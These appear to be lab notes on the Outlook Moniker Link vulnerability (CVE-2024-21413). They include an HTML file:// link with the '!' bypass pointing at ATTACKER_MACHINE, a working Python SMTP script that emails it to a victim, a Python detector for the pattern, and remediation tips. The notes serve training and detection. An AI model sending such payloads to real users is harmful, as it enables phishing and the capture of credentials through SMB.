Moniker Link (CVE-2024-21413)
<p><a href="file://ATTACKER_MACHINE/test">Click me</a></p>
Server Message Block (SMB)
A Moniker Link is a file:// hyperlink. The vulnerability is triggered by modifying the hyperlink to append ! and some text to the Moniker Link, which bypasses Outlook's Protected View.
<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>
Exploitation
- Craft an email to the victim with a Moniker Link that bypasses Outlook's "Protected View"
- Email the victim with Moniker Link
'''
Author: CMNatic | https://github.com/cmnatic
Version: 1.0 | 19/02/2024
'''
import smtplib
import sys
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm'  # Replace with your sender email address
receiver_email = 'victim@monikerlink.thm'  # Replace with the recipient email address
password = input("Enter your attacker email password: ")

# Email body: the Moniker Link is delivered as an ordinary HTML hyperlink
html_content = """\
<!DOCTYPE html>
<html lang="en">
<body>
<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>
</body>
</html>"""

message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email

# Wrap the HTML string in a text/html MIME part and attach it to the message object
msgHtml = MIMEText(html_content, 'html')
message.attach(msgHtml)

# Connect to the mail server (replace MAILSERVER with the SMTP host) and authenticate
server = smtplib.SMTP('MAILSERVER', 25)
server.ehlo()
try:
    server.login(sender_email, password)
except Exception as err:
    print(err)
    sys.exit(-1)

try:
    server.sendmail(sender_email, [receiver_email], message.as_string())
    print("\n Email delivered")
except Exception as error:
    print(error)
finally:
    server.quit()
- Takes an attacker & victim email. Normally, you would need to use your own SMTP server (this has already been provided for you in this room)
- Requires the password to authenticate. For this room, the password for attacker@monikerlink.thm is attacker
- Contains the email content (html_content), which contains our Moniker Link as an HTML hyperlink
- Then, fills in the "subject", "from" and "to" fields of the email
- Finally, sends the email to the mail server
Detection
A Yara rule has been created by Florian Roth to detect emails containing the file:\\ element in the Moniker Link.
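As an added example (not the Yara rule above, and not part of the room or CMNatic's script), the same idea as a small Python detector: it parses an email, pulls every href out of the text/html parts and flags file:// links that carry the ! suffix described above. The sample message, its sender/recipient addresses and the FILESERVER host are constructed for the example.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# Constructed sample message (not a real capture): one benign link and one
# file:// link carrying the "!" suffix that marks the Moniker Link pattern.
SAMPLE_EMAIL = """\
From: sender@example.test
To: victim@example.test
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p><a href="https://example.test/report">Quarterly report</a></p>
<p><a href="file://FILESERVER/share/test!exploit">Click me</a></p>
</body></html>
"""

# file:// or file:\\ scheme, a host/path, then "!" and any trailing text
MONIKER_RE = re.compile(r"^file:[/\\]{2}[^!\s]+!\S*", re.IGNORECASE)


class HrefCollector(HTMLParser):
    """Collect the href value of every <a> tag the parser sees."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())


def extract_hrefs(raw_email):
    """Return every href found in the text/html parts of an RFC 822 message."""
    hrefs = []
    for part in message_from_string(raw_email).walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            collector = HrefCollector()
            collector.feed(part.get_payload(decode=True).decode(charset, "replace"))
            hrefs.extend(collector.hrefs)
    return hrefs


def find_moniker_links(raw_email):
    """Return the hrefs shaped like file://host/path!text (the Moniker Link pattern)."""
    return [h for h in extract_hrefs(raw_email) if MONIKER_RE.match(h)]
```

Run it over .eml files from a mail gateway or quarantine; any non-empty result from find_moniker_links is a candidate for the same triage as a Yara hit.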
Remediation
- Updating Office through Windows Update is strongly recommended
- Do not click random links
- Preview links before clicking them
- Forward suspicious emails to the respective department responsible for cyber security